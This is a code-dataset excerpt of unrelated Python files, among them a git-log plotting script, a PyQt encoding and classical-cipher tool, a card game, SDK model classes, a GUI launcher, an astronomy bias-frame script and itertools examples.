#print(git_rev_list)\n commit_cnt = self.get_commit_cnt(git_rev_list)# grap it\n #print(commit_cnt)\n if cumulative == 0:\n rev1 = rev2\n # if get back 0 then its an invalid revision number\n #print(commit_cnt)\n if commit_cnt:\n git_tag_date = Popen(gittag, stdout=PIPE, stderr=DEVNULL, shell=True)# grap it\n days = self.get_tag_days(git_tag_date, self.basetime) # grap it\n #print(\"%d %d %d\" % (sl,days,commit_cnt))\n self.sublevels.append(sl) \n 
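# Editor's note (added): with --c=c, rev1 stays pinned to the base tag, so commit_cnt is cumulative across sublevels; draw() later differences the list back to per-release counts (e.g. [3, 7, 12] -> [3, 4, 5]).\n 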
self.release_days.append(days) \n self.commits.append(commit_cnt)\n \n #self.collect.append((sl,days,commit_cnt))# colect them into list\n else:\n break\n def draw(self):\n self.commits = [self.commits[0]]+[self.commits[i]-self.commits[i-1] for i in range(1,len(self.commits))]\n print(self.sublevels,self.commits)\n plt.scatter(self.sublevels,self.commits,c ='red') \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"1v4.4.png\") \n plt.show()\n plt.bar(self.sublevels,self.commits) \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"2v4.4.png\")\n plt.show()\n plt.plot(self.sublevels,self.commits,linestyle = 'solid') \n plt.title(\"development of fixes over sublevel\") \n plt.ylabel(\"kernel sublevel stable release\") \n plt.xlabel(\"stable fix commits\") \n plt.savefig(\"3v4.4.png\")\n plt.show()\nif __name__ == '__main__':\n getlog = GetGitLog()\n getlog.draw()","sub_path":"homework2.py","file_name":"homework2.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435186410","text":"# _ __ _ _\n# | | / _| | | (_)\n# ___ _ __ _ _ _ __ | |_ ___ | |_ _ _ _ __ ___| |_ _ ___ _ __ ___\n# / __| '__| | | | '_ \\| __/ _ \\ | _| | | | '_ \\ / __| __| |/ _ \\| '_ \\/ __|\n# | (__| | | |_| | |_) | || (_) | | | | |_| | | | | (__| |_| | (_) | | | \\__ \\\n# \\___|_| \\__, | .__/ \\__\\___/ |_| \\__,_|_| |_|\\___|\\__|_|\\___/|_| |_|___/\n# __/ | |\n# |___/|_| by fatnet\n\nimport base64 # importing lib to encode/decode base16/32/64\nimport hashlib # importing lib to encode hash-functions\nimport math # importing lib to get math.ceil function\nimport string # importing lib to get ascii letters string\n# libs to work with GUI correctly\nimport sys\nimport itertools\nfrom PyQt5 import uic\nfrom PyQt5.QtWidgets import QApplication, QWidget, QPushButton, QMainWindow\nfrom PyQt5.QtWidgets import QLabel, QLineEdit, QHBoxLayout, QInputDialog\nfrom CryptoTool.cryptotoolUI import Ui_CryptoTool\n\n\n# Debugged. Works Ok.\ndef base16_encrypt(s): # base16 cipher encrypt function\n return base64.b16encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base16_decrypt(s): # base16 cipher decrypt function\n return base64.b16decode(s).decode()\n\n\n# Debugged. Works Ok.\ndef base32_encrypt(s): # base32 cipher encrypt function\n return base64.b32encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base32_decrypt(s): # base32 cipher decrypt function\n return base64.b32decode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base64_encrypt(s): # base64 cipher encrypt function\n return base64.b64encode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef base64_decrypt(s): # base64 cipher decrypt function\n return base64.b64decode(str.encode(s)).decode()\n\n\n# Debugged. Works Ok.\ndef sha512(s): # sha512 string to hash function\n h = hashlib.sha512()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha384(s): # sha384 string to hash function\n h = hashlib.sha384()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha256(s): # sha256 string to hash function\n h = hashlib.sha256()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. 
Works Ok.\ndef sha224(s): # sha224 string to hash function\n h = hashlib.sha224()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef sha1(s): # sha1 string to hash function\n h = hashlib.sha1()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef md5(s): # md5 string to hash function\n h = hashlib.md5()\n h.update(bytes(s, encoding=\"utf-8\"))\n return h.hexdigest()\n\n\n# Debugged. Works Ok.\ndef hex_encrypt(s): # hex cipher encrypt function\n return ''.join([str(hex(ord(c)))[2:] for c in s])\n\n\n# Debugged. Works Ok.\ndef hex_decrypt(s): # hex cipher decrypt function\n return str(bytes.fromhex(s))[2:-1]\n\n\n# Debugged. Works Ok.\ndef caesar_encrypt(s, key): # caesar cipher encrypt function\n key = int(key)\n chars = string.ascii_lowercase # not stepped alphabet\n key_chars = chars[key % 26:] + chars[:key % 26] # getting alphabet stepped with key\n table = s.maketrans(chars, key_chars) # making a table using the maketrans method\n return s.translate(table) # returning str(table)\n\n\n# Debugged. Works Ok.\ndef caesar_decrypt(s, key): # caesar cipher decrypt function\n return caesar_encrypt(s, (26 - int(key)) % 26)\n # caesar cipher decode function with key is similar to caesar cipher encode function with key=26-(key%26)\n\n\n# Debugged. Works Ok.\ndef rot13_decrypt(s): # rot13 cipher decrypt function\n return caesar_decrypt(s, -13)\n # rot13 cipher is similar to caesar with key 13\n\n\n# Debugged. Works Ok.\ndef rot13_encrypt(s): # rot13 cipher encrypt function\n return caesar_encrypt(s, 13)\n # rot13 cipher is similar to caesar with key 13\n\n\n# Debugged. Works Ok.\ndef vigenere_encrypt(s, key): # vigenere cipher encrypt function\n k = key * (len(s) // len(key) + 1) # making key len valid\n cipher = ''.join([chr((ord(j) + ord(k[i])) % 26 + ord('A')) for i, j in enumerate(s)])\n return cipher\n\n\n# Debugged. Works Ok.\ndef vigenere_decrypt(s, key): # vigenere cipher decrypt function\n k = key * (len(s) // len(key) + 1) # making key len valid\n dec = ''.join([chr((ord(j) - ord(k[i])) % 26 + ord('A')) for i, j in\n enumerate(s)])\n return dec\n\n\n# Debugged. Works Ok.\ndef fence_create(lst, numrails): # fence functions turns string into railfence view and into list from railfence view\n numrails = int(numrails)\n fence = [[None] * len(lst) for n in range(numrails)]\n # generating fence with the size that is required for the numrails\n rails = list(range(numrails - 1)) + list(range(numrails - 1, 0, -1)) # generating rails\n for n, x in enumerate(lst):\n fence[rails[n % len(rails)]][n] = x # generating railfence table\n return [c for rail in fence for c in rail if c is not None] # making it list\n\n\n# Debugged. Works Ok.\ndef railfence_encode(text, n): # railfence cipher encrypt function\n n = int(n)\n return ''.join(fence_create(text, n))\n\n\n# Debugged. Works Ok.\ndef railfence_decode(text, n): # railfence cipher decrypt function\n n = int(n)\n rng = range(len(text))\n pos = fence_create(rng, n)\n return ''.join(text[pos.index(n)] for n in rng)\n # rail fence decode with key n is the same with fence(rng, n)[pos.index(n)] for n in range(len(text))\n\n\n# Debugged. 
Works Ok.\ndef scytale_encrypt(plain_text, key): # scytale cipher encrypt function\n key = int(key)\n chars = []\n for c in plain_text:\n if c not in [' ', ',', '.', '?', '!', ':', ';', \"'\"]: # getting only letters from plain_text\n chars.append(c.upper())\n chunks = math.ceil(len(chars) / float(key)) # getting table size\n inters, j = [], 1\n for i in range(2, chunks + 1):\n inters.append(tuple(chars[j - 1:(j + key) - 1]))\n j += key\n\n cipher = []\n for k in range(key): # for k in range rows\n for l in range(chunks): # for j in range columns\n if k >= len(inters[l]):\n cipher.append('+')\n else:\n cipher.append(inters[l][k])\n return ''.join(cipher)\n\n\n# Debugged. Works Ok.\ndef scytale_decrypt(cipher_text, key): # scytale cipher decrypt function\n chars = [c for c in cipher_text]\n chunks = int(math.ceil(len(chars) / float(key))) # getting table size\n inters, j = [], 1\n\n for i in range(2, key + 1):\n inters.append(tuple(chars[j - 1:(j + chunks) - 1]))\n j += chunks\n\n plain = []\n for k in range(chunks): # for k in range columns\n for l in range(len(inters)): # for j in range rows\n plain.append(inters[l][k])\n\n return ''.join(plain)\n\n\n# Debugged. Works Ok.\ndef bin_encrypt(s): # binary cipher encrypt function\n st = s.split()\n ciph = []\n for word in st:\n for letter in word:\n ciph.append(bin(ord(letter))[2:])\n return ' '.join(ciph)\n\n\n# Debugged. Works Ok.\ndef bin_decrypt(s): # binary cipher decrypt function\n st = s.split()\n enc = ''\n for n in st:\n enc += chr(int(n, 2))\n return enc\n\n\n# Debugged. Works Ok.\ndef what_to_do(action, func, s, key):\n actions = {\n 'ReverseE': reversed,\n 'ReverseD': reversed,\n 'BinaryD': bin_decrypt,\n 'BinaryE': bin_encrypt,\n 'hexD': hex_decrypt,\n 'hexE': hex_encrypt,\n 'Base16D': base16_decrypt,\n 'Base16E': base16_encrypt,\n 'Base32E': base32_encrypt,\n 'Base32D': base32_decrypt,\n 'Base64E': base64_encrypt,\n 'Base64D': base64_decrypt,\n 'ROT13E': rot13_encrypt,\n 'ROT13D': rot13_decrypt,\n 'md5 hashE': md5,\n 'sha1 hashE': sha1,\n 'sha224 hashE': sha224,\n 'sha256 hashE': sha256,\n 'sha384 hashE': sha384,\n 'sha512 hashE': sha512,\n 'ScytaleE': scytale_encrypt,\n 'ScytaleD': scytale_decrypt,\n 'CaesarE': caesar_encrypt,\n 'CaesarD': caesar_decrypt,\n 'RailFenceE': railfence_encode,\n 'RailFenceD': railfence_decode,\n 'VigenereD': vigenere_decrypt,\n 'VigenereE': vigenere_encrypt,\n }\n if key is None:\n return actions[func + action.upper()](s)\n else:\n return actions[func + action.upper()](s, key)\n\n\n# Debugged. Works Ok.\nclass CryptoToolMainWindow(QMainWindow, Ui_CryptoTool, QWidget):\n # Debugged. Works Ok.\n def __init__(self, parent=None):\n super().__init__(parent)\n self.setupUi(self)\n self.input, self.output = '', ''\n self.decodeType, self.encodeType, self.key = None, None, None\n self.key_required = [\"Scytale\", \"Caesar\", \"RailFence\", \"Vigenere\"]\n self.decodeButton.clicked.connect(self.run_decode)\n self.encodeButton.clicked.connect(self.run_encode)\n\n # Debugged. 
Works Ok.\n def run_encode(self):\n action, ok_button_pressed = QInputDialog.getItem(\n self,\n \"Encode\",\n \"Choose encoding type\",\n (\n \"Reverse\", \"Scytale\", \"Binary\", \"hex\", \"Base16\", \"Base32\",\n \"Base64\",\n \"ROT13\", \"Caesar\", \"RailFence\", \"Vigenere\", \"md5 hash\",\n \"sha1 hash\",\n \"sha224 hash\", \"sha256 hash\", \"sha384 hash\", \"sha512 hash\"),\n 1,\n False\n )\n if ok_button_pressed:\n self.encodeType = action\n if self.encodeType not in self.key_required:\n try:\n text = what_to_do(\"e\", self.encodeType, self.Input.text(), None)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n else:\n self.key_encode()\n\n # Debugged. Works Ok.\n def run_decode(self):\n action, ok_button_pressed = QInputDialog.getItem(\n self,\n \"Decode\",\n \"Choose decoding type\",\n (\n \"Reverse\", \"Scytale\", \"Binary\", \"hex\", \"Base16\", \"Base32\",\n \"Base64\",\n \"ROT13\", \"Caesar\", \"RailFence\", \"Vigenere\"),\n 1,\n False\n )\n if ok_button_pressed:\n self.decodeType = action\n if self.decodeType not in self.key_required:\n try:\n text = what_to_do(\"d\", self.decodeType, self.Input.text(), None)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n else:\n self.key_decode()\n\n # Debugged. Works Ok.\n def key_encode(self):\n key, ok_button_pressed = QInputDialog.getText(\n self, \"Key\", \"Insert key\"\n )\n if ok_button_pressed:\n self.key = key\n try:\n text = what_to_do(\"e\", self.encodeType, self.Input.text(), self.key)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n\n # Debugged. Works Ok.\n def key_decode(self):\n key, ok_button_pressed = QInputDialog.getText(\n self, \"Key\", \"Insert key\"\n )\n if ok_button_pressed:\n self.key = key\n try:\n text = what_to_do(\"d\", self.decodeType, self.Input.text(), self.key)\n self.Output.setText(text)\n except Exception:\n self.Output.setText(\"-Error-\")\n\n\n# Debugged. 
Works Ok.\nif __name__ == \"__main__\":\n app = QApplication(sys.argv)\n prog = CryptoToolMainWindow()\n prog.show()\n sys.exit(app.exec())\n","sub_path":"CyberSecurityTool-master/CyberSecurityTool-master/CryptoTool/CryptoToolmain.py","file_name":"CryptoToolmain.py","file_ext":"py","file_size_in_byte":11819,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"72285244","text":"from player import Player\nfrom board import Board\nfrom deck import Deck\nfrom turn import Turn\n\nclass Game(object):\n\n def __init__(self, numOfPlayers, players = None):\n self.board = Board()\n self.deck = Deck()\n self.numOfPlayers = numOfPlayers\n if players == None:\n self.players = [Player(8 if numOfPlayers == 1 else 7 if numOfPlayers == 2 else 6) for p in range(numOfPlayers)]\n else: self.players = players\n self.turn = None\n self.turnsPlayed = 0\n\n def setup(self):\n self.deck.shuffle()\n self.deck.deal([player.hand for player in self.players])\n self.startTurn(self.players[0])\n\n def playCard(self, player, card, pile = None, pileIndex = None):\n cardFromHand = player.hand.takeCardFromHand(card)\n if(pile): pile.putCardOnPile(cardFromHand)\n if(pileIndex != None): self.board.piles[pileIndex].putCardOnPile(cardFromHand)\n self.turn.cardsPlayed += 1\n\n def startTurn(self, player):\n self.turn = Turn(player)\n\n def endTurn(self):\n if self.turn.canEnd():\n self.turnsPlayed += 1\n self.deck.deal([self.turn.player.hand])\n self.startTurn(self.players[self.turnsPlayed%self.numOfPlayers])","sub_path":"game.py","file_name":"game.py","file_ext":"py","file_size_in_byte":1250,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"526411425","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n# Generated file, DO NOT EDIT\n# Changes may cause incorrect behavior and will be lost if the code is regenerated.\n# --------------------------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ExtensionRequest(Model):\n \"\"\"ExtensionRequest.\n\n :param reject_message: Required message supplied if the request is rejected\n :type reject_message: str\n :param request_date: Date at which the request was made\n :type request_date: datetime\n :param requested_by: Represents the user who made the request\n :type requested_by: :class:`IdentityRef `\n :param request_message: Optional message supplied by the requester justifying the request\n :type request_message: str\n :param request_state: Represents the state of the request\n :type request_state: object\n :param resolve_date: Date at which the request was resolved\n :type resolve_date: datetime\n :param resolved_by: Represents the user who resolved the request\n :type resolved_by: :class:`IdentityRef `\n \"\"\"\n\n _attribute_map = {\n 'reject_message': {'key': 'rejectMessage', 'type': 'str'},\n 'request_date': {'key': 'requestDate', 'type': 'iso-8601'},\n 'requested_by': {'key': 'requestedBy', 'type': 'IdentityRef'},\n 'request_message': {'key': 'requestMessage', 'type': 'str'},\n 'request_state': {'key': 'requestState', 'type': 'object'},\n 'resolve_date': {'key': 'resolveDate', 'type': 'iso-8601'},\n 'resolved_by': {'key': 'resolvedBy', 'type': 'IdentityRef'}\n }\n\n def __init__(self, reject_message=None, request_date=None, requested_by=None, request_message=None, request_state=None, resolve_date=None, resolved_by=None):\n super(ExtensionRequest, self).__init__()\n self.reject_message = reject_message\n self.request_date = request_date\n self.requested_by = requested_by\n self.request_message = request_message\n self.request_state = request_state\n self.resolve_date = resolve_date\n self.resolved_by = resolved_by\n","sub_path":"vsts/vsts/extension_management/v4_0/models/extension_request.py","file_name":"extension_request.py","file_ext":"py","file_size_in_byte":2516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"483729232","text":"#!/usr/bin/env python2\n# -*- coding: UTF-8 -*-\n# ---------------------------------------------------------------------------\n# ___ __ __ __ ___\n# / | \\ | \\ | \\ / Automatic\n# \\__ |__/ |__/ |___| \\__ Annotation\n# \\ | | | | \\ of\n# ___/ | | | | ___/ Speech\n# =============================\n#\n# http://www.lpl-aix.fr/~bigi/sppas\n#\n# ---------------------------------------------------------------------------\n# developed at:\n#\n# Laboratoire Parole et Langage\n#\n# Copyright (C) 2011-2014 Brigitte Bigi\n#\n# Use of this software is governed by the GPL, v3\n# This banner notice must not be removed\n# ---------------------------------------------------------------------------\n#\n# SPPAS is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# SPPAS is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with SPPAS. If not, see .\n#\n# ----------------------------------------------------------------------------\n# File: sndroamer.py\n# ----------------------------------------------------------------------------\n\n__docformat__ = \"\"\"epytext\"\"\"\n__authors___ = \"\"\"Brigitte Bigi (brigitte.bigi@gmail.com)\"\"\"\n__copyright__ = \"\"\"Copyright (C) 2011-2014 Brigitte Bigi\"\"\"\n\n\n# ---------------------------------------------------------------------------\n# Imports\n# ---------------------------------------------------------------------------\n\nimport sys\nimport os\nimport os.path\nfrom argparse import ArgumentParser\nimport tkMessageBox\n\n\n# VERIFY PYTHON\n# -------------\nif sys.version_info < (2, 7):\n tkMessageBox.showwarning(\n \"Python Error...\",\n \"Your python version is too old. SndRoamer requires 2.7\\n. Verify your python installation and try again.\"\n )\n sys.exit(1)\n\nif sys.version_info >= (3, 0):\n tkMessageBox.showwarning(\n \"Python Error...\",\n \"Your python version is not appropriate. SndRoamer requires 2.7\\n. Verify your python installation and try again.\"\n )\n sys.exit(1)\n\n\n# VERIFY WXPYTHON\n# ----------------\n\ntry:\n import wx\nexcept ImportError:\n import tkMessageBox\n tkMessageBox.showwarning(\n \"WxPython Error...\",\n \"WxPython is not installed on your system.\\n. Verify your installation and try again.\"\n )\n sys.exit(1)\n\n# THEN, VERIFY SPPAS\n# ------------------\n\n# Make sure that we can import libraries\nPROGRAM = os.path.abspath(__file__)\nSPPAS = os.path.join(os.path.dirname( os.path.dirname( PROGRAM ) ), \"src\")\nsys.path.insert(0,SPPAS)\n\ntry:\n from wxgui.frames.sndroamerframe import SndRoamerFrame\n from wxgui.sp_icons import SNDROAMER_APP_ICON\n from utils.commons import setup_logging\nexcept ImportError as e:\n import tkMessageBox\n tkMessageBox.showwarning(\n \"Error...\",\n \"A problem occurred.\\nVerify your installation and try again.\\n\\nThe system error message is: %s\" % str(e)\n )\n sys.exit(1)\n\n\n# ---------------------------------------------------------------------------\n# Main application\n# ---------------------------------------------------------------------------\n\n# Log\nlog_level = 1\nlog_file = None\nsetup_logging(log_level, log_file)\n\n\n# Arguments\n# ------------------------------------------------------------------------\n\nparser = ArgumentParser(usage=\"%s files\" % os.path.basename(PROGRAM), description=\"SndRoamer graphical user interface.\")\nparser.add_argument(\"files\", nargs=\"*\", help='Input file name(s)')\nargs = parser.parse_args()\n\n# force to add path\nfilenames = []\nfor f in args.files:\n p,b = os.path.split( f )\n if not p:\n p = os.getcwd()\n filenames.append( os.path.abspath(os.path.join(p,b) ))\n\n\n# App\narguments = {}\narguments['files'] = []\narguments['title'] = \"SndRoamer\"\narguments['type'] = \"SOUNDFILES\"\narguments['icon'] = SNDROAMER_APP_ICON\n\napp = wx.App()\nframe = SndRoamerFrame(None, -1, arguments)\napp.SetTopWindow(frame)\n\nframe.AddFiles( filenames )\n\napp.MainLoop()\n\n# ---------------------------------------------------------------------------\n","sub_path":"sppas/bin/sndroamer.py","file_name":"sndroamer.py","file_ext":"py","file_size_in_byte":4548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"43232552","text":"#!/usr/bin/env python\n\n\"\"\" NOT_Bias 
- Function to create bias for NOT polarimetric data\n    v1.0: 2018-10-02, mdevogele@lowell.edu\n\"\"\"\n\nimport argparse\n\nimport numpy as np\n\nfrom astropy.io import fits\n\n\n#def Median(Bias):\n#    Master = np.median(Bias,axis=0)\n#    print('Computed median')\n#    return Master\n#\n#def Mean(Bias):\n#    Master = np.mean(Bias,axis=0)\n#    print('Computed mean') \n#    return Master\n\n\ndef rebin(arr, new_shape):\n    \"\"\"Rebin 2D array arr to shape new_shape by averaging.\"\"\"\n    shape = (new_shape[0], arr.shape[0] // new_shape[0],\n             new_shape[1], arr.shape[1] // new_shape[1])\n    return arr.reshape(shape).mean(-1).mean(1)\n\n\nclass Result(object):\n    def Indiv_to_Master(self, method, Bias):\n        Master = getattr(self, method, lambda x: getattr(self, 'Default')(Bias))(Bias)\n        # Call the method as we return it\n        return Master\n    \n    def Median(self,Bias):\n        Master = np.median(Bias,axis=0)\n        return Master\n    \n    def Mean(self,Bias):\n        Master = np.mean(Bias,axis=0)\n        return Master\n\n    def Default(self, Bias):\n        Master = np.median(Bias,axis=0)\n        print(\"Invalid method, use of the median as default\")\n        return Master \n\n\ndef Create_Bias(filenames,MasterName,Verbose,Method,Bin):\n    \n    \n    if Verbose:\n        print('Beginning bias processing')\n        print('Processing files:')\n        print('index \\t filename')\n        for idx,elem in enumerate(filenames):\n            print('{} \\t {}'.format(idx+1,elem))\n        print('Creating the master bias')\n    \n    \n    Bias = []\n    for image in filenames:\n        hdulist = fits.open(image)\n        data = hdulist[1].data\n        data = rebin(data, (np.shape(data)[0] // Bin, np.shape(data)[1] // Bin))\n        Bias.append(data)\n    \n    Res = Result()\n    MasterBias = Res.Indiv_to_Master(Method, Bias)\n    \n    # Cropping the data to avoid the vignetting in science frames \n    hdulist[1].data = MasterBias[100:300,100:300]\n\n    hdulist.writeto(MasterName, overwrite = True)\n    hdulist.close() \n    \n\n    if Verbose:\n        print('Master bias saved to {}'.format(MasterName))\n        hdulist = fits.open(MasterName)\n        data = hdulist[1].data\n        print('Statistics of the Master bias')\n        print('Mean: {} \\t Median: {} \\t std: {}'.format(np.mean(data), np.median(data), np.std(data)))\n        print('End of bias processing')\n        hdulist.close()\n    \n    \n\n\n\n\nif __name__ == '__main__':\n    \n    parser = argparse.ArgumentParser(description='Processing and creation of master bias')\n    parser.add_argument('-v',\n                        help='Increase verbosity',\n                        action=\"store_true\") \n    parser.add_argument('-o',\n                        help='Name of the master bias file',\n                        default='MasterBias.fits')\n    parser.add_argument('-m',\n                        help='Method to use to compute the master bias: Mean, Median',\n                        default='Median') \n    \n    parser.add_argument('-bin',\n                        help='Binning factor',\n                        default=1) \n    parser.add_argument('images', help='images to process or \\'all\\'',\n                        nargs='+')\n\n    args = parser.parse_args()\n\n    Verbose = args.v\n    MasterName = args.o\n    filenames = args.images \n    Method = args.m \n    Bin = int(args.bin) \n\n    Create_Bias(filenames,MasterName,Verbose,Method,Bin)\n    pass","sub_path":"NOT_Bias.py","file_name":"NOT_Bias.py","file_ext":"py","file_size_in_byte":3445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"559336712","text":"from eden.util import fit_estimator as eden_fit_estimator\nimport numpy\nfrom sklearn.calibration import CalibratedClassifierCV\nfrom scipy.sparse import vstack\nfrom sklearn.linear_model import SGDClassifier\nimport random\n\n\nclass EstimatorWrapper:\n\n    '''\n    graphlearn will expect fit to return an estimator that is used in the graphlearn\n    (if you use sampler.fit)\n    
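\n    A minimal usage sketch (my_vectorizer is a placeholder for whatever eden\n    vectorizer the caller supplies; it is not defined in this module):\n\n        wrapper = EstimatorWrapper()\n        estimator = wrapper.fit(graphs, vectorizer=my_vectorizer, nu=.5, cv=2)\n    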
'''\n\n    def fit(self, graphs, vectorizer=None, nu=.5, cv=2, n_jobs=-1, random_state=None):\n        if random_state is not None:\n            random.seed(random_state)\n        data_matrix = vectorizer.fit_transform(graphs)\n        self.estimator = self.fit_estimator(data_matrix, n_jobs=n_jobs, cv=cv, random_state=random_state)\n        cal_estimator = self.calibrate_estimator(data_matrix, estimator=self.estimator, nu=nu, cv=cv)\n        return cal_estimator\n\n    def fit_2(self, pos_iterator, neg_iterator, vectorizer=None, cv=2, n_jobs=-1):\n        \"\"\"\n        This is used in the discsampler .,., i am not sure why i am not using eden directly.\n        I will fix this when i look into the disk sampler next time.\n        :param pos_iterator:\n        :param neg_iterator:\n        :param vectorizer:\n        :param cv:\n        :param n_jobs:\n        :return:\n        \"\"\"\n\n        data_matrix = vectorizer.fit_transform(pos_iterator)\n        negative_data_matrix = vectorizer.transform(neg_iterator)\n        estimator = eden_fit_estimator(SGDClassifier(loss='log'),\n                                       positive_data_matrix=data_matrix,\n                                       negative_data_matrix=negative_data_matrix,\n                                       cv=cv,\n                                       n_jobs=n_jobs,\n                                       n_iter_search=10)\n        # esti= CalibratedClassifierCV(estimator,cv=cv,method='sigmoid')\n        # esti.fit( vstack[ X,Y], numpy.asarray([1]*X.shape[0] + [0]*Y.shape[0]))\n        return estimator\n\n    def fit_estimator(self, data_matrix, n_jobs=-1, cv=2, random_state=42):\n        '''\n        create self.estimator...\n        by inverting the data_matrix set to get a negative set\n        and then using edens fit_estimator\n        '''\n        # create negative set:\n        data_matrix_neg = data_matrix.multiply(-1)\n        # i hope loss is log.. not 100% sure..\n        # probably calibration will fix this#\n        return eden_fit_estimator(SGDClassifier(loss='log'), positive_data_matrix=data_matrix,\n                                  negative_data_matrix=data_matrix_neg,\n                                  cv=cv,\n                                  n_jobs=n_jobs,\n                                  n_iter_search=10,\n                                  random_state=random_state)\n\n    def calibrate_estimator(self, data_matrix, estimator=None, nu=.5, cv=2):\n        '''\n        move bias until nu of data_matrix are in the negative class\n        then use scikits calibrate to calibrate self.estimator around the input\n        '''\n        # move bias\n        l = [(estimator.decision_function(g)[0], g) for g in data_matrix]\n        l.sort(key=lambda x: x[0])\n        element = int(len(l) * nu)\n        estimator.intercept_ -= l[element][0]\n\n        # calibrate\n        data_matrix_binary = vstack([a[1] for a in l])\n        data_y = numpy.asarray([0] * element + [1] * (len(l) - element))\n        estimator = CalibratedClassifierCV(estimator, cv=cv, method='sigmoid')\n        estimator.fit(data_matrix_binary, data_y)\n\n        return estimator\n","sub_path":"graphlearn/estimatorwrapper.py","file_name":"estimatorwrapper.py","file_ext":"py","file_size_in_byte":3499,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"}
+{"seq_id":"297627167","text":"# Copyright 2020 The Cobalt Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"Starboard Linux x64x11 Clang 3.9 Cobalt configuration.\"\"\"\n\nfrom starboard.linux.shared.cobalt import configuration as shared_configuration\nfrom starboard.tools.testing import test_filter\n\n\nclass CobaltLinuxX64X11Clang39Configuration(\n shared_configuration.CobaltLinuxConfiguration):\n \"\"\"Starboard Linux x64x11 Clang 3.9 Cobalt configuration.\"\"\"\n\n def GetTestFilters(self):\n filters = super().GetTestFilters()\n for target, tests in self.__FILTERED_TESTS.items():\n filters.extend(test_filter.TestFilter(target, test) for test in tests)\n return filters\n\n # A map of failing or crashing tests per target.\n __FILTERED_TESTS = { # pylint: disable=invalid-name\n 'zip_unittests': [\n 'ZipReaderTest.ExtractToFileAsync_RegularFile',\n ],\n # Tracked by b/226999079.\n 'renderer_test': [\n 'LottieCoveragePixelTest*skottie_linear_wipe_effect_json',\n 'LottieCoveragePixelTest*skottie_matte_blendmode_json',\n 'LottieCoveragePixelTest*skottie_shift_channels_effect_json',\n 'LottieCoveragePixelTest*skottie_3d_2planes_json',\n 'LottieCoveragePixelTest*skottie_venetianblinds_effect_json',\n ],\n }\n","sub_path":"starboard/linux/x64x11/clang/3.9/cobalt/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"187504902","text":"import pandas as pd\n\nfrom survive_label_prediction.config.resource import Resource\n\n\ndef load_csv():\n # storage_path = Path(__file__).parents[2] / \"survive_label_prediction\" / \"storage\"\n # storage_path = Path(__file__).parents[1] / \"storage\"\n #\n # train_csv_path = storage_path / \"train.csv\"\n # test_csv_path = storage_path / \"train.csv\"\n\n # train = pd.read_csv(train_csv_path)\n # test = pd.read_csv(test_csv_path)\n\n r = Resource()\n train_csv_path = r.storage_path / \"train.csv\"\n test_csv_path = r.storage_path / \"test.csv\"\n\n train = pd.read_csv(train_csv_path)\n test = pd.read_csv(test_csv_path)\n\n return train, test\n\n\nif __name__ == \"__main__\":\n print(load_csv())\n","sub_path":"survive_label_prediction/controllers/load_csv.py","file_name":"load_csv.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"523786767","text":"import itertools\n\n# COUNT\ncounter = itertools.count()\n\nfor _ in range(10):\n print(next(counter)) # Prints numbers from 0 through 9\n\nmy_counter = itertools.count(start=5, step=5) # It can take negative value for step argument\n\nfor _ in range(10):\n print(next(my_counter))\n\nnames = ['apple', 'microsoft', 'google', 'yahoo']\n\nname_id = zip(itertools.count(), names)\n\nfor item in name_id:\n print(item)\n\n# 